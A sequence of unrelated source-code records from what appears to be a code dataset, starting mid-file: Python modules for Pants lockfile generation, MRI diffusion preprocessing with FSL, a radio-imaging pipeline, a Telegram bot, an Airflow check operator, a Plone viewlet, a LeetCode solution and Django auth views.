pants.backend.python.util_rules.poetry_conversions import create_pyproject_toml\nfrom pants.engine.addresses import Addresses\nfrom pants.engine.fs import (\n CreateDigest,\n Digest,\n DigestContents,\n FileContent,\n MergeDigests,\n Workspace,\n)\nfrom pants.engine.goal import Goal, GoalSubsystem\nfrom pants.engine.process import ProcessResult\nfrom pants.engine.rules import Get, MultiGet, collect_rules, goal_rule, rule\nfrom pants.engine.target import TransitiveTargets, TransitiveTargetsRequest\nfrom pants.engine.unions import UnionMembership, union\nfrom pants.python.python_setup import PythonSetup\nfrom pants.util.logging import LogLevel\nfrom pants.util.ordered_set import FrozenOrderedSet\nfrom pants.util.strutil import pluralize\n\nlogger = logging.getLogger(__name__)\n\n# --------------------------------------------------------------------------------------\n# Generic lockfile generation\n# --------------------------------------------------------------------------------------\n\n\nclass PoetrySubsystem(PythonToolRequirementsBase):\n options_scope = \"poetry\"\n help = \"Used to generate lockfiles for third-party Python dependencies.\"\n\n default_version = \"poetry==1.1.7\"\n\n register_interpreter_constraints = True\n default_interpreter_constraints = [\"CPython>=3.6\"]\n\n\n# We must monkeypatch Poetry to include `setuptools` and `wheel` in the lockfile. This was fixed\n# in Poetry 1.2. See https://github.com/python-poetry/poetry/issues/1584.\n# WONTFIX(#12314): only use this custom launcher if using Poetry 1.1..\nPOETRY_LAUNCHER = FileContent(\n \"__pants_poetry_launcher.py\",\n dedent(\n \"\"\"\\\n from poetry.console import main\n from poetry.puzzle.provider import Provider\n\n Provider.UNSAFE_PACKAGES = set()\n main()\n \"\"\"\n ).encode(),\n)\n\n\n@dataclass(frozen=True)\nclass PythonLockfile:\n digest: Digest\n path: str\n\n\n@dataclass(frozen=True)\nclass PythonLockfileRequest:\n requirements: FrozenOrderedSet[str]\n interpreter_constraints: InterpreterConstraints\n dest: str\n description: str\n regenerate_command: str\n\n @classmethod\n def from_tool(\n cls,\n subsystem: PythonToolRequirementsBase,\n interpreter_constraints: InterpreterConstraints | None = None,\n *,\n extra_requirements: Iterable[str] = (),\n ) -> PythonLockfileRequest:\n \"\"\"Create a request for a dedicated lockfile for the tool.\n\n If the tool determines its interpreter constraints by using the constraints of user code,\n rather than the option `--interpreter-constraints`, you must pass the arg\n `interpreter_constraints`.\n \"\"\"\n return cls(\n requirements=FrozenOrderedSet((*subsystem.all_requirements, *extra_requirements)),\n interpreter_constraints=(\n interpreter_constraints\n if interpreter_constraints is not None\n else subsystem.interpreter_constraints\n ),\n dest=subsystem.lockfile,\n description=f\"Generate lockfile for {subsystem.options_scope}\",\n regenerate_command=\"./pants tool-lock\",\n )\n\n @property\n def requirements_hex_digest(self) -> str:\n \"\"\"Produces a hex digest of the requirements input for this lockfile.\"\"\"\n return calculate_invalidation_digest(self.requirements)\n\n\n@rule(desc=\"Generate lockfile\", level=LogLevel.DEBUG)\nasync def generate_lockfile(\n req: PythonLockfileRequest, poetry_subsystem: PoetrySubsystem, python_setup: PythonSetup\n) -> PythonLockfile:\n pyproject_toml = create_pyproject_toml(req.requirements, req.interpreter_constraints).encode()\n pyproject_toml_digest, launcher_digest = await MultiGet(\n Get(Digest, CreateDigest([FileContent(\"pyproject.toml\", pyproject_toml)])),\n Get(Digest, CreateDigest([POETRY_LAUNCHER])),\n )\n\n poetry_pex = await Get(\n VenvPex,\n PexRequest(\n output_filename=\"poetry.pex\",\n internal_only=True,\n requirements=poetry_subsystem.pex_requirements(),\n interpreter_constraints=poetry_subsystem.interpreter_constraints,\n main=EntryPoint(PurePath(POETRY_LAUNCHER.path).stem),\n sources=launcher_digest,\n ),\n )\n\n # WONTFIX(#12314): Wire up Poetry to named_caches.\n # WONTFIX(#12314): Wire up all the pip options like indexes.\n poetry_lock_result = await Get(\n ProcessResult,\n VenvPexProcess(\n poetry_pex,\n argv=(\"lock\",),\n input_digest=pyproject_toml_digest,\n output_files=(\"poetry.lock\", \"pyproject.toml\"),\n description=req.description,\n ),\n )\n poetry_export_result = await Get(\n ProcessResult,\n VenvPexProcess(\n poetry_pex,\n argv=(\"export\", \"-o\", req.dest),\n input_digest=poetry_lock_result.output_digest,\n output_files=(req.dest,),\n description=(f\"Exporting Poetry lockfile to requirements.txt format for {req.dest}\"),\n level=LogLevel.DEBUG,\n ),\n )\n\n initial_lockfile_digest_contents = await Get(\n DigestContents, Digest, poetry_export_result.output_digest\n )\n metadata = LockfileMetadata(req.requirements_hex_digest, req.interpreter_constraints)\n lockfile_with_header = metadata.add_header_to_lockfile(\n initial_lockfile_digest_contents[0].content,\n regenerate_command=(\n python_setup.lockfile_custom_regeneration_command or req.regenerate_command\n ),\n )\n final_lockfile_digest = await Get(\n Digest, CreateDigest([FileContent(req.dest, lockfile_with_header)])\n )\n return PythonLockfile(final_lockfile_digest, req.dest)\n\n\n# --------------------------------------------------------------------------------------\n# User lockfiles\n# --------------------------------------------------------------------------------------\n\n\nclass LockSubsystem(GoalSubsystem):\n name = \"lock\"\n help = \"Generate a lockfile.\"\n\n\nclass LockGoal(Goal):\n subsystem_cls = LockSubsystem\n\n\n@goal_rule\nasync def lockfile_goal(\n addresses: Addresses,\n python_setup: PythonSetup,\n workspace: Workspace,\n) -> LockGoal:\n if python_setup.lockfile is None:\n logger.warning(\n \"You ran `./pants lock`, but `[python-setup].experimental_lockfile` is not set. Please \"\n \"set this option to the path where you'd like the lockfile for your code's \"\n \"dependencies to live.\"\n )\n return LockGoal(exit_code=1)\n\n # TODO(#12314): Looking at the transitive closure to generate a single lockfile will not work\n # when we have multiple user lockfiles supported. Ideally, `./pants lock ::` would mean\n # \"regenerate all unique lockfiles\", whereas now it means \"generate a single lockfile based\n # on this transitive closure.\"\n transitive_targets = await Get(TransitiveTargets, TransitiveTargetsRequest(addresses))\n\n reqs = PexRequirements.create_from_requirement_fields(\n tgt[PythonRequirementsField]\n # NB: By looking at the dependencies, rather than the closure, we only generate for\n # requirements that are actually used in the project.\n for tgt in transitive_targets.dependencies\n if tgt.has_field(PythonRequirementsField)\n )\n\n if not reqs:\n logger.warning(\n \"No third-party requirements found for the transitive closure, so a lockfile will not \"\n \"be generated.\"\n )\n return LockGoal(exit_code=0)\n\n result = await Get(\n PythonLockfile,\n PythonLockfileRequest(\n reqs.req_strings,\n # TODO(#12314): Use interpreter constraints from the transitive closure.\n InterpreterConstraints(python_setup.interpreter_constraints),\n dest=python_setup.lockfile,\n description=(\n f\"Generate lockfile for {pluralize(len(reqs.req_strings), 'requirement')}: \"\n f\"{', '.join(reqs.req_strings)}\"\n ),\n # TODO(12382): Make this command actually accurate once we figure out the semantics\n # for user lockfiles. This is currently misleading.\n regenerate_command=\"./pants lock ::\",\n ),\n )\n workspace.write_digest(result.digest)\n logger.info(f\"Wrote lockfile to {result.path}\")\n\n return LockGoal(exit_code=0)\n\n\n# --------------------------------------------------------------------------------------\n# Tool lockfiles\n# --------------------------------------------------------------------------------------\n\n\n@union\nclass PythonToolLockfileSentinel:\n pass\n\n\n# TODO(#12314): Unify this goal with `lock` once we figure out how to unify the semantics,\n# particularly w/ CLI specs. This is a separate goal only to facilitate progress.\nclass ToolLockSubsystem(GoalSubsystem):\n name = \"tool-lock\"\n help = \"Generate a lockfile for a Python tool.\"\n required_union_implementations = (PythonToolLockfileSentinel,)\n\n\nclass ToolLockGoal(Goal):\n subsystem_cls = ToolLockSubsystem\n\n\n@goal_rule\nasync def generate_all_tool_lockfiles(\n workspace: Workspace,\n union_membership: UnionMembership,\n) -> ToolLockGoal:\n # TODO(#12314): Add logic to inspect the Specs and generate for only relevant lockfiles. For\n # now, we generate for all tools.\n requests = await MultiGet(\n Get(PythonLockfileRequest, PythonToolLockfileSentinel, sentinel())\n for sentinel in union_membership.get(PythonToolLockfileSentinel)\n )\n if not requests:\n return ToolLockGoal(exit_code=0)\n\n results = await MultiGet(\n Get(PythonLockfile, PythonLockfileRequest, req)\n for req in requests\n if req.dest not in {NO_TOOL_LOCKFILE, DEFAULT_TOOL_LOCKFILE}\n )\n merged_digest = await Get(Digest, MergeDigests(res.digest for res in results))\n workspace.write_digest(merged_digest)\n for result in results:\n logger.info(f\"Wrote lockfile to {result.path}\")\n\n return ToolLockGoal(exit_code=0)\n\n\ndef rules():\n return collect_rules()\n","sub_path":"src/python/pants/backend/experimental/python/lockfile.py","file_name":"lockfile.py","file_ext":"py","file_size_in_byte":10891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401536371","text":"import KeyManagementModule\nimport UserOperationsModule\n\n#initializations\nKeyManagementModule.importPubliclist()\nUserOperationsModule.importuserlist()\n\nans=True\nwhile ans:\n print (\"\"\"MAIN MENU\n 0. Exit from the Program\n 1. Register to the system\n 2. Login with the existing account\n \"\"\")\n ans=raw_input(\"Selection: \")\n if ans == \"0\":\n print(\"\\n Goodbye\")\n ans = False\n elif ans==\"1\":\n print(\"\\n***> Register to the system <***\")\n uid = UserOperationsModule.registerToSystem()\n elif ans==\"2\":\n print(\"\\n***> Login <***\")\n id=UserOperationsModule.login()\n if id!=0: #succesfull login\n UserOperationsModule.submenu(id)\n elif ans !=\"\":\n print(\"\\n Not Valid Choice Try again\")\n\n\n\n\n\n","sub_path":"testmodule.py","file_name":"testmodule.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201779063","text":"#this script takes converted bbc dti data, skull strips and performs eddy current correction with and without\n#--repol replace outliers\nimport os, inspect, datetime\nfrom pathlib import *\nimport numpy as np\nimport nibabel as nib\nimport mmimproc\nfrom scipy.ndimage.measurements import center_of_mass as com\nfrom scipy.ndimage.filters import median_filter as medianf\nfrom nipype.interfaces import fsl\nfrom dipy.io import read_bvals_bvecs\nfrom dipy.core.gradients import gradient_table\nfrom dipy.segment.mask import applymask\nfrom mmimproc.io.images import savenii\nfrom mmimproc.projects.bbc.dwi.passed_qc import dwi_passed_qc, dwi_passed_101\nfrom mmimproc.utils.provenance import ProvenanceWrapper\nfrom mmimproc.io.images import savenii\nfrom mmimproc.conversion.nifti2nrrd import nii2nrrd\nfrom mmimproc.utils import run_subprocess, WorkingContext\nfrom mmimproc.utils.paths import getnetworkdataroot\n#set up instances\nprovenance = ProvenanceWrapper()\nfs = mmimproc.fs_local\nflt = fsl.FLIRT(bins=640, interp='nearestneighbour', cost_func='mutualinfo', output_type='NIFTI')\napplyxfm = fsl.ApplyXFM(interp='nearestneighbour', output_type='NIFTI')\nbet = fsl.BET(output_type='NIFTI')\npylabs_basepath = Path(*Path(inspect.getabsfile(mmimproc)).parts[:-2])\n#set paths for BET atlases\nMNI_bet_zcut = pylabs_basepath / 'data' / 'atlases' / 'MNI152_T1_1mm_bet_zcut.nii.gz'\nMNI_bet_zcut_mask = pylabs_basepath / 'data' / 'atlases' / 'MNI152_T1_1mm_bet_zcut_mask.nii.gz'\nMNI_bet_com = pylabs_basepath / 'data' / 'atlases' / 'MNI152_T1_1mm-com-mask8k.nii.gz'\n#set up project variables\nproject = 'bbc'\n#directory where eddy current corrected data is stored\noutdir = 'cuda_repol_std2_S0mf3_v5'\nfilterS0_string = ''\nfilterS0 = True\nif filterS0:\n filterS0_string = '_withmf3S0'\nfname_templ = 'sub-bbc{sid}_ses-{snum}_{meth}_{runnum}'\ndwi_fnames = [fname_templ.format(sid=str(s), snum=str(ses), meth=m, runnum=str(r)) for s, ses, m, r in dwi_passed_qc]\noverride_mask = {'sub-bbc101_ses-2_dti_15dir_b1000_1': fs / project / 'sub-bbc101/ses-2/dwi/sub-bbc101_ses-2_dti_15dir_b1000_1_S0_brain_mask_jsedits.nii'}\n#loop over pairs\nfor dwif in dwi_fnames:\n infpath = fs / project / dwif.split('_')[0] / dwif.split('_')[1] / 'dwi'\n fdwi = infpath / str(dwif + '.nii')\n fbvecs = infpath / str(dwif + '.bvecs')\n fbvals = infpath / str(dwif + '.bvals')\n fdwell = infpath / str(dwif + '.dwell_time')\n S0_fname = infpath / str(dwif + '_S0.nii')\n with WorkingContext(str(infpath)):\n bvals, bvecs = read_bvals_bvecs(str(fbvals), str(fbvecs))\n # make dipy gtab and load dwi data\n gtab = gradient_table(bvals, bvecs)\n img = nib.load(str(fdwi))\n data = img.get_data()\n # make S0 and bet to get mask\n S0 = data[:, :, :, gtab.b0s_mask]\n if filterS0:\n S0_fname = infpath / str(dwif + filterS0_string +'_S0.nii')\n S0 = medianf(S0, size=3)\n data[:, :, :, gtab.b0s_mask] = S0\n fdwi = infpath / str(dwif + filterS0_string + '.nii')\n savenii(data, img.affine, str(fdwi), header=img.header)\n savenii(S0, img.affine, str(S0_fname))\n provenance.log(str(S0_fname), 'S0 dwi from '+str(fdwi), str(fdwi), code=__file__)\n #setup result object capture\n fslresult = ()\n dt = datetime.datetime.now()\n fslresult += (str(dt),'flirt_zcut2S0')\n # make mat file to apply mask and com\n flt.inputs.in_file = str(MNI_bet_zcut)\n flt.inputs.reference = str(S0_fname)\n flt.inputs.out_matrix_file = str(S0_fname)[: -6] + 'bet2S0.mat'\n flt.inputs.out_file = str(S0_fname)[: -6] + 'S0_zcut.nii'\n result = flt.run()\n fslresult += (result,)\n # apply mat file to center of mass ROI in MNI template\n dt = datetime.datetime.now()\n fslresult += (str(dt),'applyxfm_com2S0')\n applyxfm.inputs.in_matrix_file = str(S0_fname)[: -6] + 'bet2S0.mat'\n applyxfm.inputs.in_file = str(MNI_bet_com)\n applyxfm.inputs.out_file = str(infpath / str(dwif + '_S0_match_bet_com_roi.nii'))\n applyxfm.inputs.reference = str(S0_fname)\n applyxfm.inputs.apply_xfm = True\n result = applyxfm.run()\n fslresult += (result,)\n # apply mat file to MNI mask file to cut off neck\n dt = datetime.datetime.now()\n fslresult += (str(dt),'applyxfm_mask2S0')\n applyxfm.inputs.in_matrix_file = str(S0_fname)[: -6] + 'bet2S0.mat'\n applyxfm.inputs.in_file = str(MNI_bet_zcut_mask)\n applyxfm.inputs.out_file = str(infpath / str(dwif + '_S0_mask.nii'))\n applyxfm.inputs.reference = str(S0_fname)\n applyxfm.inputs.apply_xfm = True\n result = applyxfm.run()\n fslresult += (result,)\n # chop off neck with MNI zcut\n zcut_data = nib.load(str(infpath / str(dwif + '_S0_mask.nii'))).get_data()\n zcut_data_maskb = zcut_data > 0\n S0_mask = np.zeros(np.squeeze(S0).shape) # need to add a fourth dim here\n S0_mask[zcut_data_maskb] = 1\n S0_zcut = applymask(S0, S0_mask)\n savenii(S0_zcut, img.affine, str(infpath / str(dwif + '_S0_zcut.nii')))\n\n # get com for fsl bet\n com_data = nib.load(str(infpath / str(dwif + '_S0_match_bet_com_roi.nii'))).get_data()\n com_data_maskb = com_data > 4000\n com_data_mask = np.zeros(com_data.shape)\n com_data_mask[com_data_maskb] = 1\n match_com = np.round(com(com_data_mask)).astype(int)\n\n # extract brain and make brain mask before eddy current correction\n brain_outfname = str(S0_fname)[: -6] + 'S0_brain'\n bet.inputs.in_file = str(infpath / str(dwif + '_S0_zcut.nii'))\n bet.inputs.center = list(match_com)\n bet.inputs.frac = 0.3\n bet.inputs.mask = True\n bet.inputs.skull = True\n bet.inputs.out_file = brain_outfname + '.nii'\n result = bet.run()\n fslresult += (result,)\n provenance.log(brain_outfname + '.nii', 'brain extracted S0 dwi from ' + str(dwif), str(S0_fname), code=__file__)\n provenance.log(brain_outfname + '_mask.nii', 'dwi brain mask from ' + str(dwif), str(S0_fname), code=__file__)\n # make index and acquisition parameters files\n with open(str(infpath / 'index.txt'), 'w') as f:\n f.write('1 ' * len(gtab.bvals))\n\n with open(str(fdwell), 'r') as f:\n dwell = f.read().replace('\\n', '')\n\n with open(str(infpath / 'acq_params.txt'), 'w') as f:\n f.write('0 1 0 ' + dwell)\n\n # execute eddy command in subprocess in local working directory using repol and lower stddev and linear 2nd level model\n # winner of DWI preproc deathmatch Oct-2016\n outpath = infpath / outdir\n if not outpath.is_dir():\n outpath.mkdir(parents=True)\n cmd = ''\n output = ()\n dt = datetime.datetime.now()\n output += (str(dt), 'eddy cuda start time for '+str(fdwi))\n cmd += 'eddy_cuda7.5 --acqp=acq_params.txt --bvals=' + str(fbvals) + ' --bvecs=' + str(fbvecs)\n cmd += ' --imain=' + str(fdwi) + ' --index=index.txt --mask='\n if dwif in override_mask:\n cmd += str(override_mask[dwif])\n else:\n cmd += brain_outfname + '_mask.nii'\n cmd += ' --out=' + str(outpath / str(dwif + filterS0_string + '_ec'))\n cmd += ' --repol --ol_sqr --slm=linear --ol_nstd=2 --niter=9 --fwhm=20,5,0,0,0,0,0,0,0'\n cmdt = (cmd,)\n output += cmdt\n output += run_subprocess(cmd)\n dt = datetime.datetime.now()\n output += (str(dt), 'eddy cuda end time for '+str(fdwi))\n params = {}\n params['eddy cmd'] = cmd\n params['eddy output'] = output\n cmd = ''\n output = ()\n dt = datetime.datetime.now()\n output += (str(dt),)\n cmd += 'fslmaths '+ str(outpath / str(dwif + filterS0_string + '_ec'))\n cmd += ' -thr 1 ' + str(outpath / str(dwif + filterS0_string + '_ec_thr1'))\n cmdt = (cmd,)\n output += cmdt\n output += run_subprocess(cmd)\n params['fslmaths clamping cmd'] = cmd\n params['fslmaths output'] = output\n provenance.log(str(outpath / str(dwif + filterS0_string + '_ec_thr1.nii.gz')),\n 'eddy using --repol --ol_sqr --slm=linear --ol_nstd=2 --niter=9 --fwhm=20,5,0,0,0,0,0,0,0',\n str(fdwi), code=__file__, provenance=params)\n","sub_path":"mmimproc/projects/bbc/dwi/eddy.py","file_name":"eddy.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524347122","text":"\"\"\"dprepb.py: The DPrepB/C imaging pipeline for SIP.\"\"\"\n\nimport sys\nimport os\n\nos.makedirs('LOGS', exist_ok=True)\nsys.stdout = open('%s/dprepb-log.txt' % ('LOGS'), 'w')\n\nimport numpy as np\n\nimport subprocess\n\nfrom data_models.polarisation import PolarisationFrame\n\nfrom processing_components.imaging.base import create_image_from_visibility, advise_wide_field\nfrom processing_components.image.operations import export_image_to_fits\nfrom processing_components.visibility.operations import append_visibility\nfrom processing_components.image.deconvolution import restore_cube\n\nfrom ska_sip.uvoperations.filter import uv_cut\nfrom ska_sip.uvoperations.convert import convert_to_stokes\nfrom ska_sip.imageoperations.images.imaging import wstack, image_2d\nfrom ska_sip.imageoperations.images.deconvolution import deconvolve_cube_complex\nfrom ska_sip.plotdata.plot import uv_cov, uv_dist\n\nsys.stdout.close()\nsys.stdout = sys.__stdout__\n\n\ndef dprepb_imaging(vis_input):\n \"\"\"The DPrepB/C imaging pipeline for visibility data.\n \n Args:\n vis_input (array): array of ARL visibility data and parameters.\n \n Returns:\n restored: clean image.\n \"\"\"\n # Load the Input Data\n # ------------------------------------------------------\n vis1 = vis_input[0]\n vis2 = vis_input[1]\n channel = vis_input[2]\n stations = vis_input[3]\n lofar_stat_pos = vis_input[4]\n APPLY_IONO = vis_input[5]\n APPLY_BEAM = vis_input[6]\n MAKE_PLOTS = vis_input[7]\n UV_CUTOFF = vis_input[8]\n PIXELS_PER_BEAM = vis_input[9]\n POLDEF = vis_input[10]\n RESULTS_DIR = vis_input[11]\n FORCE_RESOLUTION = vis_input[12]\n ionRM1 = vis_input[13]\n times1 = vis_input[14]\n time_indices1 = vis_input[15]\n ionRM2 = vis_input[16]\n times2 = vis_input[17]\n time_indices2 = vis_input[18]\n twod_imaging = vis_input[19]\n npixel_advice = vis_input[20]\n cell_advice = vis_input[21]\n \n # Make a results directory on the worker:\n os.makedirs(RESULTS_DIR, exist_ok=True)\n \n # Redirect stdout, as Dask cannot print on workers\n # ------------------------------------------------------\n sys.stdout = open('%s/dask-log.txt' % (RESULTS_DIR), 'w')\n \n # Prepare Measurement Set\n # ------------------------------------------------------\n # Combine MSSS snapshots:\n vis = append_visibility(vis1, vis2)\n \n # Apply a uv-distance cut to the data:\n vis = uv_cut(vis, UV_CUTOFF)\n \n # Make some basic plots:\n if MAKE_PLOTS:\n uv_cov(vis)\n uv_dist(vis)\n\n # Imaging and Deconvolution\n # ------------------------------------------------------\n # Convert from XX/XY/YX/YY to I/Q/U/V:\n vis = convert_to_stokes(vis, POLDEF)\n\n # Image I, Q, U, V, per channel:\n if twod_imaging:\n dirty, psf = image_2d(vis, npixel_advice, cell_advice, channel, RESULTS_DIR)\n else:\n dirty, psf = wstack(vis, npixel_advice, cell_advice, channel, RESULTS_DIR)\n\n # Deconvolve (using complex Hogbom clean):\n comp, residual = deconvolve_cube_complex(dirty, psf, niter=100, threshold=0.001, \\\n fracthresh=0.001, window_shape='', gain=0.1, \\\n algorithm='hogbom-complex')\n\n # Convert resolution (FWHM in arcmin) to a psfwidth (standard deviation in pixels):\n clean_res = (((FORCE_RESOLUTION/2.35482004503)/60.0)*np.pi/180.0)/cell_advice\n\n # Create the restored image:\n restored = restore_cube(comp, psf, residual, psfwidth=clean_res)\n\n # Save to disk:\n export_image_to_fits(restored, '%s/imaging_clean_WStack-%s.fits'\n % (RESULTS_DIR, channel))\n\n return restored\n\n\ndef arl_data_future(restored):\n \"\"\"Return the data from an ARL object.\n \n Args:\n restored (ARL object): ARL image data.\n \n Returns:\n restored.data: clean image.\n \"\"\"\n \n return restored.data\n","sub_path":"DPrepB-C/ska_sip/pipelines/dprepb.py","file_name":"dprepb.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556955150","text":"from Acquisition import aq_chain\nfrom opengever.base.browser.helper import get_css_class\nfrom opengever.base.interfaces import ISQLObjectWrapper\nfrom opengever.ogds.base.utils import get_current_admin_unit\nfrom opengever.ogds.models.service import ogds_service\nfrom opengever.repository.interfaces import IRepositoryFolder\nfrom opengever.repository.repositoryroot import IRepositoryRoot\nfrom plone.app.layout.navigation.interfaces import INavigationRoot\nfrom plone.app.layout.viewlets import common\nfrom Products.CMFPlone.interfaces import IHideFromBreadcrumbs\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\n\nclass PathBar(common.PathBarViewlet):\n \"\"\"The breadcrumb viewlet.\n\n Unlike the plone default pathbar viewlet it groups all repository paths in\n to a dropdown list and shows the content icon for each crumb.\n \"\"\"\n\n index = ViewPageTemplateFile('pathbar.pt')\n\n leaf_node = None\n repository_chain = None\n obj_chain = None\n\n def admin_unit_label(self):\n return get_current_admin_unit().label()\n\n def update(self):\n repository_items, self.obj_chain = self.get_chains()\n\n if repository_items:\n self.leaf_node = repository_items[0]\n if len(repository_items) > 1:\n self.repository_chain = repository_items[1:]\n\n def is_part_of_repo(self, obj):\n return IRepositoryRoot.providedBy(obj) or \\\n IRepositoryFolder.providedBy(obj)\n\n def get_chains(self):\n repository = []\n chain = []\n for obj in aq_chain(self.context):\n if INavigationRoot.providedBy(obj):\n break\n\n if IHideFromBreadcrumbs.providedBy(obj):\n continue\n\n if ISQLObjectWrapper.providedBy(obj):\n data = obj.get_breadcrumb()\n else:\n data = {\n 'absolute_url': obj.absolute_url(),\n 'title': obj.Title(),\n 'css_class': get_css_class(obj, type_icon_only=True)\n }\n\n if self.is_part_of_repo(obj):\n repository.append(data)\n else:\n chain.append(data)\n\n chain.reverse()\n\n return repository, chain\n\n def has_multiple_admin_units(self):\n return ogds_service().has_multiple_admin_units()\n","sub_path":"opengever/base/viewlets/pathbar.py","file_name":"pathbar.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598380091","text":"from aiogram.dispatcher import FSMContext\r\nfrom aiogram.dispatcher.filters import Command, CommandStart\r\nfrom aiogram import types\r\nfrom aiogram.types import ReplyKeyboardRemove\r\nfrom keyboards.default import user_keyboard\r\nfrom loader import dp, db\r\n\r\n\r\n# хэндлер обработки команды для добавления почты\r\n@dp.message_handler(Command(\"mail\"))\r\nasync def update_email(message: types.Message, state: FSMContext):\r\n await message.answer(\"Пришли мне свою почту, на которую я могу отправлять файлы и уведомления.\",\r\n reply_markup=user_keyboard.keyboard)\r\n await state.set_state(\"mail\")\r\n\r\n\r\n# добавление почты в БД\r\n@dp.message_handler(state=\"mail\")\r\nasync def enter_email(message: types.Message, state: FSMContext):\r\n mail = message.text\r\n\r\n import re\r\n if re.match(r\"^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$\", mail):\r\n db.update_user_email(email=mail, id=message.from_user.id)\r\n await message.answer(f\"Почта занесена в ваши данные.\", reply_markup=ReplyKeyboardRemove())\r\n await state.finish()\r\n else:\r\n await message.reply(text=f\"Почта указана не верно. Попробуйте еще раз.\",\r\n reply_markup=user_keyboard.keyboard)\r\n\r\n\r\n# хэндлер обработки команды для добавления номера группы\r\n@dp.message_handler(CommandStart(deep_link=\"number_party\"))\r\n@dp.message_handler(Command(\"party\"))\r\nasync def update_email(message: types.Message, state: FSMContext):\r\n await message.answer(\"Пришли мне свою группу\", reply_markup=user_keyboard.keyboard)\r\n await state.set_state(\"number_party\")\r\n\r\n\r\n# добавление номера группы в БД\r\n@dp.message_handler(state=\"number_party\")\r\nasync def enter_email(message: types.Message, state: FSMContext):\r\n number_party = message.text\r\n if number_party in ['101', '102', '103', '104', '105']:\r\n db.update_number_party(number_party=number_party, id=message.from_user.id)\r\n user = db.select_user(id=message.from_user.id)\r\n await message.answer(f\"Данные обновлены. Запись в БД: {user}\", reply_markup=ReplyKeyboardRemove())\r\n await state.finish()\r\n else:\r\n await message.reply(text=f\"Такой группы не существует, укажи группу еще раз или нажми кнопку отмена\",\r\n reply_markup=user_keyboard.keyboard)\r\n","sub_path":"handlers/users/db_mode/database_commands.py","file_name":"database_commands.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343979044","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass DataQualityOperator(BaseOperator):\n \"\"\"\n Operator to perform validation of the results of a Data Pipeline.\n \n :param redshift_conn_id: Airflow connection id to Redshift configuration (default '')\n :param table: Target Redshift table to validate (default '')\n :param test_sql: SSql to retrive the data to be validated. Supports Airflow Macros templating (default '')\n :param result_checker: Lambda callback function to check if the result is valid. If false is return the operator will raise a value error (default 'lambda x: True')\n \"\"\"\n ui_color = '#89DA59'\n template_fields = (\"test_sql\",)\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id = \"\",\n table=\"\",\n test_sql=\"\",\n result_checker=(lambda x: True),\n *args, **kwargs):\n\n super(DataQualityOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.table = table\n self.test_sql = test_sql\n self.result_checker = result_checker\n\n def execute(self, context):\n self.log.info(f\"Started data quality verification on Redshift table ({self.table})\")\n sql = self.test_sql.format(**context)\n redshift_hook = PostgresHook(self.redshift_conn_id)\n result = redshift_hook.get_records(sql)\n if self.result_checker(result[0][0]) == False:\n raise ValueError(f\"Data quality check failed against {self.table}.\")\n\n self.log.info(f\"Completed data quality verification on Redshift table ({self.table}) successfully\")","sub_path":"plugins/operators/data_quality.py","file_name":"data_quality.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263490651","text":"'''\r\nYou are climbing a stair case. It takes n steps to reach to the top.\r\n\r\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\r\n\r\nInput: 3\r\nOutput: 3\r\nExplanation: There are three ways to climb to the top.\r\n1. 1 step + 1 step + 1 step\r\n2. 1 step + 2 steps\r\n3. 2 steps + 1 step\r\n'''\r\n\r\nclass Solution:\r\n\tdef climbStairs(self, n:int)->int:\r\n\t\t#implement fibonacci sequence\r\n\t\tif n == 1:\r\n\t\t\treturn 1\r\n\t\telif n == 2:\r\n\t\t\treturn 2\r\n\t\telse:\r\n\t\t\treturn self.climbStairs(n-1)+self.climbStairs(n-2)\r\n\r\n\r\n\r\ndef main():\r\n\tsol = Solution()\r\n\toutput = sol.climbStairs(35)\r\n\tprint(output)\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n\r\n","sub_path":"70_climbStairs.py","file_name":"70_climbStairs.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531203879","text":"import os\r\nfrom django.shortcuts import render, redirect\r\nfrom .forms import LoginForm, ImageForm\r\nfrom .models import VssImage, ShareServerImage, ShareUserImage, ResultImage\r\nfrom django.views.generic import TemplateView\r\nfrom django.contrib.auth.views import LoginView, LogoutView\r\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\r\nfrom django.conf import settings\r\n\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.contrib.auth import login as auth_login, logout as auth_logout\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.decorators.cache import never_cache\r\n\r\nfrom .vss import CreateVss, CheckVss\r\n\r\n# Create your views here.\r\n\r\nclass MyLogoutView(LogoutView):\r\n @method_decorator(never_cache)\r\n def dispatch(self, request, *args, **kwargs):\r\n # logout\r\n self.request.user.verification = False\r\n self.request.user.save()\r\n auth_logout(request)\r\n next_page = self.get_next_page()\r\n if next_page:\r\n # Redirect to this page until the session has been cleared.\r\n return HttpResponseRedirect(next_page)\r\n return super().dispatch(request, *args, **kwargs)\r\n\r\n\r\nclass VerificationTestMixin(UserPassesTestMixin):\r\n raise_exception = False\r\n\r\n def test_func(self):\r\n if self.request.user.is_verification():\r\n print('Authenticated')\r\n return True\r\n auth_logout(self.request)\r\n\r\n return False 